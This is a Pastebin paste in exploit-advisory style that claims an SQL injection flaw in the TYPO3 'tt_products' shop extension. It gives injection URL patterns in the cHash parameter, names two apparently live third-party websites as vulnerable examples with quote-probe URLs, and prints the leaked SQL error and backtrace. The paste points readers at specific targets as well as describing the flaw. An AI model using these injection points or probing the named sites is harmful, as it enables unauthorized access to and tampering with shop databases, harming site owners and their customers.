Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##############################################################################################
- # Exploit Title : Typo3 CMS Shop System tt_products 2.9.4 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 18/02/2019
- # Vendor Homepage : ttproducts.de ~ jambage.com ~ typo3.org
- # Software Download Links :
- extensions.typo3.org/extension/download/tt_products/2.9.4/zip/
- extensions.typo3.org/extension/download/tt_products/2.6.9/zip/
- # Software Information Link : extensions.typo3.org/extension/tt_products/
- # Software Affected Versions : From 2.6.9 to 2.9.4 / All Versions
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ##############################################################################################
- # Description about Software :
- ***************************
- New versions at ttproducts.de. Documented in E-Book "Der TYPO3-Webshop" -
- Shop with listing in multiple languages, with order tracking, photo gallery, DAM,
- product variants, credit card payment and bank accounts, bill, creditpoint,
- voucher system and gift certificates. Latest updates at ttproducts.de.
- ##############################################################################################
- # Impact :
- ***********
- Typo3 Shop System tt_products 2.9.4 [ and other versions ]
- extension for TYPO3 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize
- user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ##############################################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?id=[ID-NUMBER]&L=[ID-NUMBER]&tt_products%5BbackPID%5D=[ID-NUMBER]&tt_products%5Bproduct%5D=[ID-NUMBER]&cHash=[SQL Injection]
- /shop.html?tt_products%5Barea%5D=energi&tt_products%5Bbegin_at%5D=[ID-NUMBER]&cHash=[SQL Injection]
- ##############################################################################################
- # Example Vulnerable Sites :
- *************************
- [+] globalis.ag/index.php?id=1227&L=1&tt_products%5BbackPID%5D=120&tt_products%5Bproduct%5D=672&cHash=1%27
- [+] tuv-akademie.at/shop.html?tt_products%5Barea%5D=energi&tt_products%5Bbegin_at%5D=50&cHash=1%27
- ##############################################################################################
- # Example SQL Database Error :
- ****************************
- exec_SELECTquery
- ---------------------------
- caller
- *******
- TYPO3\CMS\Core\Database\DatabaseConnection::exec_SELECTquery
- ERROR
- *********
- Unknown column 'textslang.t3ver_label' in 'field list'
- lastBuiltQuery
- ************
- SELECT texts.uid uid,textslang.pid pid,textslang.tstamp tstamp,
- textslang.crdate crdate,textslang.deleted deleted,textslang.t3ver_label t3ver_label,
- textslang.sorting sorting,textslang.hidden hidden,textslang.starttime starttime,textslang
- .endtime endtime,textslang.fe_group fe_group,textslang.title title,texts.marker marker,
- textslang.note note,texts.parentid parentid,texts.parenttable parenttable,textslang.
- sys_language_uid sys_language_uid,textslang.text_uid text_uid FROM tt_products_
- texts texts,tt_products_texts_language textslang WHERE texts.uid = textslang.text_
- uid AND 1=1 AND(texts.parentid = 672 AND texts.parenttable='tt_products' AND
- texts.marker IN('ZUSATZ'))AND textslang.deleted=0 AND textslang.hidden=0
- AND(textslang.starttime<=1550505837)AND(textslang.endtime=0 OR textslang.
- endtime>1550505837)AND textslang.fe_group IN(' ',0,-1)
- AND textslang.sys_language_uid=1
- SELECT uid_local FROM tt_products_tx_onextttproductsarea_coursecat_mm WHERE uid_foreign = energi
- debug_backtrace
- ***************
- require(typo3/sysext/cms/tslib/index_ts.php),index.php#28
- // TYPO3\CMS\Frontend\Controller\TypoScriptFrontendController->INTincScript#232
- // TYPO3\CMS\Frontend\Controller\TypoScriptFrontendController->
- recursivelyReplaceIntPlaceholdersInContent#3646 // TYPO3\CMS\Frontend
- \Controller\TypoScriptFrontendController->INTincScript_process#3679
- // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->USER#3731
- // TYPO3\CMS\Frontend\ContentObject\UserContentObject->render#862
- // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->callUserFunction#41
- // call_user_func_array#6663 // tx_ttproducts_pi1_base->main#
- // tx_ttproducts_main->run#72 // tx_ttproducts_main->products_display#588
- // tx_ttproducts_single_view->printView#1053 // tx_ttproducts_text->getChildUidArray#328
- // tx_ttproducts_table_base->get#118 // tx_table_db->exec_SELECTquery#185
- // TYPO3\CMS\Core\Database\DatabaseConnection->exec_SELECTquery#1471
- // TYPO3\CMS\Core\Database\DatabaseConnection->debug#305
- ##############################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ##############################################################################################
Add Comment
Please, Sign In to add comment